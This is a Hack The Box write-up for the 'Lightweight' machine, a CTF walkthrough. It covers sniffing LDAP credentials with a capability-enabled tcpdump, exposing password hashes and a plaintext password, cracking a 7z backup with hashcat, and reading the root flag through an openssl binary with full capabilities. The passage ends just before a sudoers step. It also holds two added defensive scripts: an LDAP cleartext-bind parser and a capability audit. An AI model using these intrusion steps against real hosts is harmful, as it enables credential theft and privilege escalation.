Writeup: Hack The Box - Machines - Lightweight

Description

  • Name: Lightweight
  • IP: 10.10.10.119
  • Author: 0xEA31
  • Difficulty: 5.1/10

Discovery

nmap -sV -sC -Pn -p 1-65535 --min-rate 1000 --max-retries 5 10.10.10.119

PORT    STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDf7K92wk79uG+iF3K0XaLWtJBrMKM/PfpE01tmpOSxwdhbiXQZ1ggfXFOfjSrkNqO/W3apn2SH1IO3jRCUGmEfXUzmTlX7FKDETKKFJuSZFwdphEqxoX/wCZ+NQhBX9bMT817GjQTNPEmkQsuWUD7PcVBYhRSKohP0jbAc464VKbSeiQt6q1I71CxzUtqMnL7pOREvF41+0K0BNtQUJVKxq5Aq0g67Ba8b0UEecOwgS8O4rZeKrfuYHMXnl6n32XrjqliowOSaZl/iYOu3dgkooIEDFDiaEapOW7J71/Ag/96NWzUf1U91QxCIA2GNtAhXT+Bn+ncbFtWxGdh6enL
| 256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ2F5pumDKrMj6rP99uQehJ2kGbw7z54Ydq7uuZ8FgoTw7wJ44SSytCh1jkrQay1jRg0+4Izw0cqUeW93J5kDCc=
| 256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGwL0BBmHKyKlj3sRMsytml1etD3lMtofGbdxD8aAh1T
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open ldap syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Issuer: commonName=lightweight.htb
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-06-09T13:32:51
| Not valid after: 2019-06-09T13:32:51
| MD5: 0e61 1374 e591 83bd fd4a ee1a f448 547c
| SHA-1: 8e10 be17 d435 e99d 3f93 9f40 c5d9 433c 47dd 532f
|_ssl-date: TLS randomness does not represent time

Running gobuster or any other intrusive tool against the web server gets the IP address banned, so the web server must not be enumerated or scanned.

Pwn

The main page shows three links:

1- info

2- status

3- user

From the user page it seems that the box allows SSH connections from IPs that have visited the site. Indeed, using 10.10.15.103 as both username and password for SSH works.

Two main users are present on the machine:

ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash

No access is granted to the guest user, though. Using LinEnum it is possible to get a list of binaries with file capabilities set:

/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep

It is unusual to see tcpdump with capabilities set, so it is presumably meant to be used to sniff traffic.

tcpdump -i any -w output.pcap

Leaving it running for a few minutes (~5) captures the credentials used to authenticate ldapuser1 and ldapuser2 against the OpenLDAP service. One stream shows the sha512crypt hashes for both users:

ldapuser1:$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
ldapuser2:$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1

Another LDAP TCP stream contains an MD5 hash for ldapuser2:

0Y...`T....-uid=ldapuser2,ou=People,dc=lightweight,dc=htb. 8bc8251332abe1d7f105d3e53ad39ac20....a.
......0....B.

ldapuser2:8bc8251332abe1d7f105d3e53ad39ac2

Trying to crack all the hashes seems to be infeasible even with a big dictionary and hashcat rules. It turns out that the MD5 hash is simply the plaintext password for ldapuser2.
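The credentials above were recoverable because the clients used LDAP simple binds over plaintext port 389, where the password travels as a bare OCTET STRING. The following is an added example, not code from the original writeup: a minimal BER codec for the LDAP BindRequest shape (RFC 4511) that a port-389 monitor could use to flag every cleartext simple bind. The sample message is constructed here, with the DN from the capture and a placeholder password.

```python
# Minimal BER/LDAP BindRequest encoder + decoder (added example).

def _ber(tag: int, content: bytes) -> bytes:
    """Encode one short-form TLV (content < 128 bytes; enough for the sample)."""
    assert len(content) < 128
    return bytes([tag, len(content)]) + content

def build_simple_bind(message_id: int, dn: str, password: str) -> bytes:
    """LDAPMessage { messageID, [APPLICATION 0] BindRequest with simple auth }."""
    op = (_ber(0x02, b"\x03")                  # version 3
          + _ber(0x04, dn.encode())            # name (LDAPDN)
          + _ber(0x80, password.encode()))     # [0] simple: cleartext password
    return _ber(0x30, _ber(0x02, bytes([message_id])) + _ber(0x60, op))

def _tlv(buf: bytes, i: int):
    """Decode the TLV at offset i (short and long-form lengths)."""
    tag, ln = buf[i], buf[i + 1]
    i += 2
    if ln & 0x80:                              # long form: next n bytes hold length
        n = ln & 0x7F
        ln = int.from_bytes(buf[i:i + n], "big")
        i += n
    return tag, buf[i:i + ln], i + ln

def parse_bind_request(msg: bytes):
    """Return the fields of an LDAP BindRequest, or None if msg is another op.
    A monitor can alert whenever 'simple' is True on a non-TLS connection."""
    tag, body, _ = _tlv(msg, 0)
    if tag != 0x30:                            # LDAPMessage ::= SEQUENCE
        return None
    _, mid, i = _tlv(body, 0)                  # messageID INTEGER
    tag, op, _ = _tlv(body, i)
    if tag != 0x60:                            # [APPLICATION 0] BindRequest
        return None
    _, ver, i = _tlv(op, 0)
    _, name, i = _tlv(op, i)
    auth_tag, auth, _ = _tlv(op, i)
    return {
        "messageID": int.from_bytes(mid, "big"),
        "version": ver[0],
        "name": name.decode(),
        "simple": auth_tag == 0x80,            # 0xA3 would be a SASL bind
        "password": auth.decode() if auth_tag == 0x80 else None,
    }

# Constructed sample: DN from the capture, placeholder password (not the real one).
SAMPLE = build_simple_bind(1, "uid=ldapuser2,ou=People,dc=lightweight,dc=htb",
                           "not-the-real-password")
```

The mitigation the parser illustrates is to require StartTLS or ldaps for binds (OpenLDAP `olcSecurity: simple_bind=128`) so the password field is never on the wire in the clear.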

Now, inside the SSH session, it is possible to su to ldapuser2 using the password 8bc8251332abe1d7f105d3e53ad39ac2 and read the first flag.

In ldapuser2's home directory there is a backup.7z. The archive is password-protected, but after extracting its hash with 7z2hashcat.pl, hashcat can recover the password from rockyou:

hashcat -m 11600 -a 0 backup_hash.txt rockyou.txt -O

The archive contains the backup files for the web server and in status.php there is the ldapuser1 password:

Again, su gives a ldapuser1 session. Running LinEnum again shows two additional ELF binaries with capabilities:

[+] Files with POSIX capabilities set:
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep

openssl with =ep has every capability raised in its effective and permitted sets, so it can read and write arbitrary files regardless of owner; simply running ./openssl enc -in /root/root.txt reads the root flag.
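Both capability listings on this box (the tcpdump one in the first LinEnum run and the =ep openssl one here) can be triaged automatically. The following is an added audit script, not part of the original writeup or of LinEnum: it parses getcap-style lines, treats the bare "=ep" form as the full capability set, and rates each binary by what its effective capabilities allow. The sample input is the listing from this box.

```python
# Audit getcap / LinEnum capability lines (added example).

# Capabilities that cross a privilege boundary: packet capture, identity
# change, or discretionary-access bypass. Ratings are this example's own.
RISKY = {"cap_net_raw", "cap_net_admin", "cap_setuid", "cap_setgid",
         "cap_dac_override", "cap_dac_read_search", "cap_sys_admin"}

def parse_getcap_line(line: str):
    """Return (path, caps, flags) or None. libcap text is 'names+flags';
    a bare '=ep' (no names) means ALL capabilities are raised."""
    path, sep, spec = line.strip().partition("=")
    if not sep or not path.strip().startswith("/"):
        return None
    path, spec = path.strip(), spec.strip()
    if "+" in spec:
        names, _, flags = spec.partition("+")
        caps = {c for c in names.split(",") if c}
    else:                       # e.g. "/home/ldapuser1/openssl =ep"
        caps, flags = {"ALL"}, spec
    return path, caps, set(flags)

def risk_level(caps: set, flags: set) -> str:
    if "ALL" in caps:
        return "critical"       # arbitrary file read/write, setuid, everything
    if not caps & RISKY:
        return "low"
    # '+p' only: permitted but not effective; a capability-aware program
    # (ping) must raise it itself, so it is less directly abusable than '+ep'.
    return "high" if "e" in flags else "medium"

def audit(text: str) -> dict:
    """Map each binary path to (risk, sorted capability names)."""
    findings = {}
    for line in text.splitlines():
        parsed = parse_getcap_line(line)
        if parsed:
            path, caps, flags = parsed
            findings[path] = (risk_level(caps, flags), sorted(caps))
    return findings

# Sample: the LinEnum output from this box (constructed inline here).
SAMPLE = """[+] Files with POSIX capabilities set:
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep
"""
```

Run `audit(SAMPLE)` to get a per-binary rating; anything in a home directory with "critical" or "high" is a finding worth removing with `setcap -r`.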

To get a root shell it’s possible to add ldapuser1 to sudoers: